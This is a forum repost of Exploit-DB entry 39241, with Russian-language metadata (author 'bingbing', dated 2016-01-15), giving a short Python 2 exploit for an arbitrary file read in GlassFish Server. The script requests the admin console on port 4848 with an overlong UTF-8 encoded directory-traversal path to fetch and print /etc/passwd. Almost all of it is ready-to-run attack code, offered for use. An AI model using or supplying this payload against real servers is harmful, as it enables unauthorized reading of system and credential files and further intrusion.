- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39241
- Проверка EDB
-
- Пройдено
- Автор
- BINGBING
- Тип уязвимости
- WEBAPPS
- Платформа
- JAVA
- CVE
- N/A
- Дата публикации
- 2016-01-15
GlassFish Server - Arbitrary File Read
Код:
# Title: glassfish Arbitrary file read vulnerability
# Date : 01/15/2016
# Author: bingbing
# Software link: https://glassfish.java.net/download.html
# Software: GlassFish Server
# Tested: Linux x86
#!/usr/bin/python
import urllib2
response=urllib2.urlopen('http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd')
s=response.read()
print s- Источник
- www.exploit-db.com
